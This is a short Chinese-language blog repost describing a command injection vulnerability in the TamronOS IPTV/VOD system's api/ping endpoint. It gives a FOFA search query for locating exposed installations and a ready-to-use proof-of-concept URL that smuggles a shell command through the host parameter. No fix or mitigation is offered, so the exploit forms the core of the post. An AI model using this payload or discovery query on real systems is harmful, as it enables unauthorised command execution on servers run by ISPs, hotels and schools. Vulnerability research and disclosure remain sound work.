TamronOS IPTV系统 ping 任意命令执行漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 tamronos iptv系统 ping 任意命令执行漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案,系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。TamronOS IPTV系统 api/ping 存在任意命令执行漏洞,攻击者通过漏洞可以执行任意命令。

图片[1]-TamronOS IPTV系统 ping 任意命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofa:app=”TamronOS-IPTV系统”

1.使用POC执行id命令,得到回显

http://{{Hostname}}/api/ping?count=5&host=;id;
图片[2]-TamronOS IPTV系统 ping 任意命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容